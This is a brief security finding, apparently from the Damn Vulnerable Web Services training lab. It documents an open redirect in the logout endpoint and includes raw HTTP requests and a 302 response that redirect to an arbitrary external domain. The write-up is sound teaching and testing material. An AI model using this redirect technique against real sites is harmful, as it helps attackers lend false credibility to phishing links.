Open Redirect

Introduction

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Details

An Open Redirect issue exists within the http://dvws.local/home.html#snoopy homepage within the logout button.

GET /api/v2/users/logout/dvws.local HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://dvws.local/home.html
Upgrade-Insecure-Requests: 1

The dvws.local parameter is dynamic and it can be set by a user, resulting in open redirect. An example of this can be seen below.

GET /api/v2/users/logout/google.com HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://dvws.local/home.html
Upgrade-Insecure-Requests: 1

HTTP/1.1 302 Found
X-Powered-By: Express
Vary: Origin, Accept
Access-Control-Allow-Credentials: true
Location: http://google.com
Content-Type: text/html; charset=utf-8
Content-Length: 78
Date: Fri, 23 Apr 2021 13:15:16 GMT
Connection: close

<p>Found. Redirecting to <a href="http://google.com">http://google.com</a></p>